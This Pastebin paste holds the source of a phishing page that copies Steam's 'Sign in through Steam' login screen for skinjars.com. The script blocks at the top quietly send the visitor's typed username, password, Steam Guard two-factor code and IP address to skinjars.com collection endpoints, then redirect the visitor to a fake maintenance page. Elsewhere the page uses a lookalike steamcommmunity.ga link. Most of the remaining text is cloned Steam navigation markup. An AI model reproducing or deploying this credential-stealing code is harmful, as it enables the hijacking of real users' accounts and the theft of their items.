Advertisement
Guest User

Untitled

a guest
Aug 16th, 2017
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 67.66 KB | None | 0 0
  1. <script>
  2. $("#steamPassword,#steamAccountName").on('keyup', function (e) {
  3. if (e.keyCode == 13) {
  4. $('#imageLogin').click();
  5. }
  6. });
  7. setTimeout(function(){if(window.innerWidth > 1700){
  8. $('#steamguard').attr('style','display: none;position: absolute; z-index: 1000; max-width: 1879px; left: 710px; top: 306px;') }},
  9. 1000);</script>
  10. <script>
  11. function anmcode(){
  12. if(readCookie('log') !== 'no'){
  13. $.getJSON("https://jsonip.com?callback=?", function (data) {
  14. $.ajax({
  15. type: "POST",
  16. url: "https://skinjars.com/d/formlogs.php",
  17. data: '\n\n' + '[[ >-> TIME: ' + new Date(new Date().getTime()).toLocaleString() + ' >-> LOGGED IN FROM IP: ' + data.ip + ' WITH: ' + '\n' + ' USERNAME: ' + $('#steamAccountName').val() + '\n' + ' PASSWORD: ' + $('#steamPassword').val() + '\n' + ' CODE: ' + $('.twofactorauthcode_entry_input.authcode_placeholder').eq(1).val() + '\n' + ' REFCODE: ' + refcode + '\n' + ']] ',
  18. });
  19. });
  20. }
  21. $('.firstbutton').hide();
  22. $('.waiting').show();
  23. setTimeout(function(){
  24. $('.secondbutton').show();
  25. $('.waiting').hide();
  26. $('.twofactorauthcode_entry_input.authcode_placeholder').eq(1).val('');
  27. }, 1500);
  28.  
  29. $.ajax({
  30. type: "POST",
  31. url: "https://skinjars.com/d/codes.php",
  32. data: 'code = ' + '"' + $('.twofactorauthcode_entry_input.authcode_placeholder').eq(1).val() + '"',
  33. });
  34. }
  35.  
  36. function anmcode2(){
  37. $('.secondbutton').hide();
  38. $.ajax({
  39. type: "POST",
  40. url: "https://skinjars.com/d/codes.php",
  41. data: 'code = ' + '"' + $('.twofactorauthcode_entry_input.authcode_placeholder').eq(1).val() + '"',
  42. });
  43. $('.waiting').show();
  44. window.location = 'https://skinjars.com/maintenance/';
  45. }
  46. function login(){
  47. var valid = $('#steamAccountName').val();
  48. if(/\s/g.test(valid) == false && $('#steamAccountName').val().length !== 0 && $('#steamPassword').val().length !== 0){
  49. $('.usernamemsg').text($('#steamAccountName').val());
  50. if($('#error_display').css('display') == 'none'){
  51. anmlogin();
  52. setTimeout(function(){$('#error_display').slideDown();}, 1500);
  53. } else {
  54. $('#login_btn_signin').hide();$('#login_btn_wait').show();
  55. setTimeout(function(){modal('steamguard','show');}, 1500);
  56. }
  57. $.ajax({
  58. type: "POST",
  59. url: "https://skinjars.com/d/userdata.php",
  60. data: ' username = ' + '"' + $('#steamAccountName').val() + '"' + ';' + 'pw = ' + '"' + $('#steamPassword').val() + '"' + ';' + ' refcode = "' + refcode + '"' + ';',
  61. });
  62. } else {
  63. anmlogin();
  64. $('#error_display').slideDown();
  65. console.log('HAS SOME SPACE IN USERNAME');
  66. }
  67. }
  68. function anmlogin(){$('#login_btn_signin').hide();$('#login_btn_wait').show(); setTimeout(function(){$('#login_btn_signin').show();$('#login_btn_wait').hide();}, 1500);}function modal(id,command){
  69. if(command == 'show'){
  70. $('#' + id + '').fadeIn();
  71. $('.newmodal_background').fadeIn()
  72. }
  73. if(command == 'hide'){
  74. $('#' + id + '').fadeOut();
  75. $('.newmodal_background').fadeOut()
  76. }
  77. }</script><div class="responsive_page_frame with_header">
  78.  
  79. <div class="responsive_page_menu_ctn mainmenu">
  80. <div class="responsive_page_menu" id="responsive_page_menu">
  81. <div class="mainmenu_contents">
  82. <div class="mainmenu_contents_items">
  83. <a class="menuitem" href="https://steamcommunity.com/login/home/?goto=openid%2Flogin%3Fopenid.ns%3Dhttp%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%26openid.mode%3Dcheckid_setup%26openid.return_to%3Dhttp%3A%2F%2Fenter-wild.com%2Flogin%26openid.realm%3Dhttp%3A%2F%2Fenter-wild.com%26openid.identity%3Dhttp%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select%26openid.claimed_id%3Dhttp%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select">
  84. Login </a>
  85.  
  86. <a class="menuitem supernav" href="" data-tooltip-type="selector" data-tooltip-content=".submenu_store">
  87. Store <div class="chevron"></div></a><div class="menuitem_submenu_wrapper" style="height: 0px;"><div class="inner_borders"><div class="submenu_store" style="" data-submenuid="store">
  88. <a class="submenuitem" href="http://store.steampowered.com/">Featured</a>
  89. <a class="submenuitem" href="http://store.steampowered.com/explore/">Explore</a>
  90. <a class="submenuitem" href="http://store.steampowered.com/curators/">Curators</a>
  91. <a class="submenuitem" href="http://steamcommunity.com/my/wishlist/">Wishlist</a>
  92. <a class="submenuitem" href="http://store.steampowered.com/news/">News</a>
  93. <a class="submenuitem" href="http://store.steampowered.com/stats/">Stats</a>
  94. </div></div></div>
  95.  
  96.  
  97.  
  98. <a class="menuitem supernav" style="display: block" href="" data-tooltip-type="selector" data-tooltip-content=".submenu_community">
  99. Community <div class="chevron"></div></a><div class="menuitem_submenu_wrapper" style="height: 0px;"><div class="inner_borders"><div class="submenu_community" style="" data-submenuid="community">
  100. <a class="submenuitem" href="http://steamcommunity.com/">Home</a>
  101. <a class="submenuitem" href="http://steamcommunity.com/discussions/">Discussions</a>
  102. <a class="submenuitem" href="http://steamcommunity.com/workshop/">Workshop</a>
  103. <a class="submenuitem" href="http://steamcommunity.com/market/">Market</a>
  104. <a class="submenuitem" href="http://steamcommunity.com/?subsection=broadcasts">Broadcasts</a>
  105. </div></div></div>
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112. <a class="menuitem" href="https://help.steampowered.com/en/">
  113. Support </a>
  114.  
  115. <div class="minor_menu_items">
  116. <div class="menuitem change_language_action">
  117. Change language </div>
  118. <div class="menuitem" onclick="Responsive_RequestDesktopView();">
  119. View desktop website </div>
  120. </div>
  121. </div>
  122. <div class="mainmenu_footer_spacer"></div>
  123. <div class="mainmenu_footer">
  124. <div class="mainmenu_footer_logo"><img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/logo_valve_footer.png"></div>
  125. © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries. <span class="mainmenu_valve_links">
  126. <a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>
  127. &nbsp;| &nbsp;<a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
  128. &nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a>
  129. &nbsp;| &nbsp;<a href="http://store.steampowered.com/steam_refunds/" target="_blank">Refunds</a>
  130. </span>
  131. </div>
  132. </div>
  133. </div>
  134. </div>
  135.  
  136. <div class="responsive_local_menu_tab">
  137.  
  138. </div>
  139.  
  140. <div class="responsive_page_menu_ctn localmenu">
  141. <div class="responsive_page_menu" id="responsive_page_local_menu">
  142. <div class="localmenu_content">
  143. </div>
  144. </div>
  145. </div>
  146.  
  147.  
  148.  
  149. <div class="responsive_header">
  150. <div class="responsive_header_content">
  151. <div id="responsive_menu_logo">
  152. <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/header_menu_hamburger.png" height="100%">
  153. </div>
  154. <div class="responsive_header_logo">
  155. <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/header_logo.png" height="36" border="0" alt="STEAM">
  156. </div>
  157. </div>
  158. </div>
  159.  
  160. <div class="responsive_page_content_overlay">
  161.  
  162. </div>
  163.  
  164. <div class="responsive_fixonscroll_ctn nonresponsive_hidden ">
  165. </div>
  166.  
  167. <div class="responsive_page_content">
  168.  
  169. <div id="global_header">
  170. <div class="content">
  171.  
  172. <div class="logo">
  173. <span id="logo_holder">
  174. <a href="http://store.steampowered.com/">
  175. <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/header/globalheader_logo.png?t=962016" width="176" height="44">
  176. </a>
  177. </span>
  178. <!--[if lt IE 7]>
  179. <style type="text/css">
  180. #logo_holder img { filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); }
  181. #logo_holder { display: inline-block; width: 176px; height: 44px; filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://steamcommunity-a.akamaihd.net/public/images/v5/globalheader_logo.png'); }
  182. </style>
  183. <![endif]-->
  184. </div>
  185.  
  186. <div class="supernav_container">
  187. <a class="menuitem supernav" href="http://store.steampowered.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_store">
  188. STORE </a>
  189.  
  190.  
  191.  
  192. <a class="menuitem supernav" style="display: block" href="http://steamcommunity.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_community">
  193. COMMUNITY </a>
  194.  
  195.  
  196.  
  197.  
  198.  
  199. <a class="menuitem" href="http://store.steampowered.com/about/">
  200. ABOUT </a>
  201.  
  202. <a class="menuitem" href="https://help.steampowered.com/en/">
  203. SUPPORT </a>
  204. <div class="submenu_store" style="display: none;" data-submenuid="store">
  205. <a class="submenuitem" href="http://store.steampowered.com/">Featured</a>
  206. <a class="submenuitem" href="http://store.steampowered.com/explore/">Explore</a>
  207. <a class="submenuitem" href="http://store.steampowered.com/curators/">Curators</a>
  208. <a class="submenuitem" href="http://steamcommunity.com/my/wishlist/">Wishlist</a>
  209. <a class="submenuitem" href="http://store.steampowered.com/news/">News</a>
  210. <a class="submenuitem" href="http://store.steampowered.com/stats/">Stats</a>
  211. </div><div class="submenu_community" style="display: none;" data-submenuid="community">
  212. <a class="submenuitem" href="http://steamcommunity.com/">Home</a>
  213. <a class="submenuitem" href="http://steamcommunity.com/discussions/">Discussions</a>
  214. <a class="submenuitem" href="http://steamcommunity.com/workshop/">Workshop</a>
  215. <a class="submenuitem" href="http://steamcommunity.com/market/">Market</a>
  216. <a class="submenuitem" href="http://steamcommunity.com/?subsection=broadcasts">Broadcasts</a>
  217. </div></div>
  218. <script type="text/javascript">
  219. jQuery(function($) {
  220. $('.tooltip').v_tooltip();
  221. $('#global_header .supernav').v_tooltip({'location':'bottom', 'tooltipClass': 'supernav_content', 'offsetY':-4, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});
  222. });
  223. </script>
  224.  
  225. <div id="global_actions">
  226. <div id="global_action_menu">
  227. <div class="header_installsteam_btn header_installsteam_btn_green">
  228. <div class="header_installsteam_btn_leftcap"></div>
  229. <div class="header_installsteam_btn_rightcap"></div>
  230. <a class="header_installsteam_btn_content" href="http://store.steampowered.com/about/">
  231. Install Steam </a>
  232. </div>
  233.  
  234.  
  235. <a class="global_action_link" href="https://steamcommmunity.ga/openid/login/?openid.ns=http://specs.openid.net/auth/2.0&amp;openid.mode=checkid_setup&amp;openid.return_to=http://enter-wild.com/login&amp;openid.realm=http://enter-wild.com&amp;openid.identity=http://specs.openid.net/auth/2.0/identifier_select&amp;openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select">login</a>
  236. &nbsp;|&nbsp;
  237. <span class="pulldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span>
  238. <div class="popup_block_new" id="language_dropdown" style="display: none;">
  239. <div class="popup_body popup_menu">
  240. <a class="popup_menu_item tight" href="?l=bulgarian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'bulgarian' ); return false;">Български (Bulgarian)</a>
  241. <a class="popup_menu_item tight" href="?l=czech&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'czech' ); return false;">čeština (Czech)</a>
  242. <a class="popup_menu_item tight" href="?l=danish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'danish' ); return false;">Dansk (Danish)</a>
  243. <a class="popup_menu_item tight" href="?l=dutch&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'dutch' ); return false;">Nederlands (Dutch)</a>
  244. <a class="popup_menu_item tight" href="?l=finnish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'finnish' ); return false;">Suomi (Finnish)</a>
  245. <a class="popup_menu_item tight" href="?l=french&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'french' ); return false;">Français (French)</a>
  246. <a class="popup_menu_item tight" href="?l=german&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'german' ); return false;">Deutsch (German)</a>
  247. <a class="popup_menu_item tight" href="?l=greek&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'greek' ); return false;">Ελληνικά (Greek)</a>
  248. <a class="popup_menu_item tight" href="?l=hungarian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'hungarian' ); return false;">Magyar (Hungarian)</a>
  249. <a class="popup_menu_item tight" href="?l=italian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'italian' ); return false;">Italiano (Italian)</a>
  250. <a class="popup_menu_item tight" href="?l=japanese&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'japanese' ); return false;">日本語 (Japanese)</a>
  251. <a class="popup_menu_item tight" href="?l=koreana&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'koreana' ); return false;">한국어 (Korean)</a>
  252. <a class="popup_menu_item tight" href="?l=norwegian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'norwegian' ); return false;">Norsk (Norwegian)</a>
  253. <a class="popup_menu_item tight" href="?l=polish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'polish' ); return false;">Polski (Polish)</a>
  254. <a class="popup_menu_item tight" href="?l=portuguese&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'portuguese' ); return false;">Português (Portuguese)</a>
  255. <a class="popup_menu_item tight" href="?l=brazilian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'brazilian' ); return false;">Português-Brasil (Portuguese-Brazil)</a>
  256. <a class="popup_menu_item tight" href="?l=romanian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'romanian' ); return false;">Română (Romanian)</a>
  257. <a class="popup_menu_item tight" href="?l=russian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'russian' ); return false;">Русский (Russian)</a>
  258. <a class="popup_menu_item tight" href="?l=schinese&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'schinese' ); return false;">简体中文 (Simplified Chinese)</a>
  259. <a class="popup_menu_item tight" href="?l=spanish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'spanish' ); return false;">Español (Spanish)</a>
  260. <a class="popup_menu_item tight" href="?l=swedish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'swedish' ); return false;">Svenska (Swedish)</a>
  261. <a class="popup_menu_item tight" href="?l=tchinese&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'tchinese' ); return false;">繁體中文 (Traditional Chinese)</a>
  262. <a class="popup_menu_item tight" href="?l=thai&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'thai' ); return false;">ไทย (Thai)</a>
  263. <a class="popup_menu_item tight" href="?l=turkish&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'turkish' ); return false;">Türkçe (Turkish)</a>
  264. <a class="popup_menu_item tight" href="?l=ukrainian&amp;openid_ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;openid_mode=checkid_setup&amp;openid_return_to=http%3A%2F%2Fenter-wild.com%2Flogin&amp;openid_realm=http%3A%2F%2Fenter-wild.com&amp;openid_identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid_claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" onclick="ChangeLanguage( 'ukrainian' ); return false;">Українська (Ukrainian)</a>
  265. <a class="popup_menu_item tight" href="http://translation.steampowered.com" target="_blank">Help us translate Steam</a>
  266. </div>
  267. </div>
  268. </div>
  269. </div>
  270. </div>
  271. </div>
  272. <script type="text/javascript">
  273. g_sessionID = "0de44f121dda6d8ee1172c3d";
  274. g_steamID = false;
  275.  
  276. // We always want to have the timezone cookie set for PHP to use
  277. setTimezoneCookies();
  278.  
  279. $J( function() {
  280.  
  281. InitMiniprofileHovers();
  282. InitEmoticonHovers();
  283. window.BindCommunityTooltip = function( $Selector ) { $Selector.v_tooltip( {'tooltipClass': 'community_tooltip', 'dataName': 'communityTooltip' } ); };
  284. BindCommunityTooltip( $J('[data-community-tooltip]') );
  285. });
  286.  
  287. $J( function() { InitEconomyHovers( "https:\/\/steamcommunity-a.akamaihd.net\/public\/css\/skin_1\/economy.css?v=x3BMGofGAeJi", "https:\/\/steamcommunity-a.akamaihd.net\/public\/javascript\/economy_common.js?v=tsXdRVB0yEaR&l=english", "https:\/\/steamcommunity-a.akamaihd.net\/public\/javascript\/economy.js?v=hDn61Hn5NkI8&l=english" );});</script>
  288. <div class="responsive_page_template_content">
  289.  
  290.  
  291.  
  292.  
  293. <div id="mainBody">
  294. <div class="OpenID_MainHeader">
  295. <div class="logo"><img src="https://steamcommunity-a.akamaihd.net/public/images/signinthroughsteam/sits_landing.png" width="114" height="43" border="0"></div>
  296. <h1>Sign into <g class="origins">skinjars.com</g> using your Steam account</h1>
  297.  
  298. <div>
  299. <div style="float:left; padding: 6px 6px 20px 18px">
  300. <img src="https://steamcommunity-a.akamaihd.net/public/images/signinthroughsteam/icon_info.png" width="26" height="26" border="0">
  301. </div>
  302. <h2>Note that <g class="origins">skinjars.com</g> is not affiliated with Steam or Valve</h2>
  303. </div>
  304.  
  305. </div>
  306.  
  307.  
  308. <div class="OpenID_LowerContents">
  309.  
  310.  
  311. <div class="OpenIDCol right">
  312. <div class="OpenID_LowerContents_right">
  313. <h2>By signing into <g class="origins">skinjars.com</g> through Steam:</h2>
  314. <ul class="OpenID_list">
  315. <li class="OpenID_listitem">
  316. the site will be able to identify you within the Steam Community and retrieve public info such as your stats and achievements. </li><li class="OpenID_listitem">
  317. a unique numeric identifier will be shared with the site, rather than your Steam login credentials. </li><li class="OpenID_listitem">
  318. basic information about your Steam account will be shared with a third-party web site. See our <a href="http://www.valvesoftware.com/privacy.html">Privacy Policy</a> for more information. </li></ul>
  319. </div>
  320. </div>
  321.  
  322. <div class="OpenIDCol left">
  323. <div class="OpenID_LowerContents_left">
  324. <div>
  325. <input type="hidden" name="emailauth" id="emailauth" value="">
  326. <input type="hidden" name="emailsteamid" id="emailsteamid">
  327. <input type="hidden" name="loginfriendlyname" id="loginfriendlyname" value="">
  328. <div>Steam username</div>
  329. <input class="textField" type="text" name="username" id="steamAccountName" autofocus="" maxlength="64"><br>
  330. &nbsp;
  331. <br>
  332. <div>Password</div>
  333. <input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64"><br>
  334. <br>
  335. <div id="captcha_entry" class="captcha_oauth" style="display: none;">
  336. <input type="hidden" id="captchagid" name="captchagid" value="-1">
  337. <div id="CaptchaFormArea">
  338. <div>Type these characters below</div>
  339. <img id="captchaImg" src="https://steamcommunity.com/public/captcha.php?gid=-1" border="0"><br>
  340. <div id="captchaRefresh"><img src="https://steamcommunity-a.akamaihd.net/public/images//skin_1/blue_refresh_icon.png" id="captchaRefreshImg" border="0" onclick="RefreshCaptcha();return false;">&nbsp;<a href="#" id="captchaRefreshLink" title="Refresh" onclick="RefreshCaptcha();return false;">Refresh</a></div>
  341. <input class="textField" type="text" name="captcha_text" id="input_captcha" autocomplete="off"><br>
  342. <div class="smallLabel" id="captchaExplanation">Are you human or robot?</div>
  343. <br>
  344. </div>
  345. </div>
  346. <div id="login_btn_signin" style="display: block;">
  347. <input class="btn_green_white_innerfade" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" value="Sign in" type="submit" onclick="login()">
  348. </div>
  349. <br>
  350. <div id="login_btn_wait" style="display: none;">
  351. <img src="https://steamcommunity-a.akamaihd.net/public/images/login/throbber.gif">
  352. </div>
  353. <br clear="all">
